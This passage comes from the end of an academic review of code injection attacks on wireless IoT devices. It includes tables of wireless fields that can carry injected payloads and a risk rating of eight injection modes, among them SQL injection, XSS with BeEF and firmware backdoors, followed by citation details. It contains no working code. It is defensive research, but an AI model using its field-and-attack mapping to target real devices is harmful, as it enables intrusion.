Sender Address field of the beacon frame | 6 Octets | |||||
Short-Range Optical Wireless Communications | IEEE 802.15.7 | OWPAN ID | Hexadecimal Number | 2 Octets | Data Link | Without network credentials |
NFC | NDEF Technical Specification | Payload Type | Character String (UTF-8) | 32 Octets | Application | Without network credentials |
Payload | Character String (UTF-8 or -16) | (232–1) Octets or more | ||||
RFID | No specific standard | Payload | Various encoding formats | 16 Octets or more | Application | Without network credentials |
No. | Intrusion Mode | Intrusion Effects | Occurrence Probability | Severity | Difficulty | Pivoting Ability | Mitigation Strategies |
1 | HTML Code Injection | Showing an innocuous message. | High | Low | Low | Low |
|
2 | CSRF Code Injection | Tricking the device into performing actions, the user did not intend to do. | Medium | Medium | Medium | Medium |
|
3 | SQL Injection | Leading to data theft or manipulation. | High | High | Medium | Medium |
|
4 | XSS– DoS Attack | Allowing the attacker to steal the user’s cookies or other sensitive information or even leading to denial-of-service attacks. | High | Medium | Low | Medium |
|
5 | XSS– BeEF | Allowing the attacker to steal the user’s cookies or other sensitive information or even leading to further attack vectors. | Medium | High | Medium | High |
|
6 | Firmware Backdoor Injection | Giving the attacker full control of the device. | Low | High | High | High |
|
7 | Firmware Command Injection | Allowing the attacker to execute arbitrary commands on the device | Medium | High | High | High |
|
8 | Firmware Script Injection | Allowing the attacker to run malicious code on the device | Low | High | High | High |
|
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content. |
© 2023 by the authors. Licensee MDPI, Basel, Switzerland. This article is an open access article distributed under the terms and conditions of the Creative Commons Attribution (CC BY) license (https://creativecommons.org/licenses/by/4.0/).
Share and Cite
Noman, H.A.; Abu-Sharkh, O.M.F. Code Injection Attacks in Wireless-Based Internet of Things (IoT): A Comprehensive Review and Practical Implementations. Sensors 2023, 23, 6067. https://doi.org/10.3390/s23136067
Noman HA, Abu-Sharkh OMF. Code Injection Attacks in Wireless-Based Internet of Things (IoT): A Comprehensive Review and Practical Implementations. Sensors. 2023; 23(13):6067. https://doi.org/10.3390/s23136067
Chicago/Turabian StyleNoman, Haitham Ameen, and Osama M. F. Abu-Sharkh. 2023. "Code Injection Attacks in Wireless-Based Internet of Things (IoT): A Comprehensive Review and Practical Implementations" Sensors 23, no. 13: 6067. https://doi.org/10.3390/s23136067
APA StyleNoman, H. A., & Abu-Sharkh, O. M. F. (2023). Code Injection Attacks in Wireless-Based Internet of Things (IoT): A Comprehensive Review and Practical Implementations. Sensors, 23(13), 6067. https://doi.org/10.3390/s23136067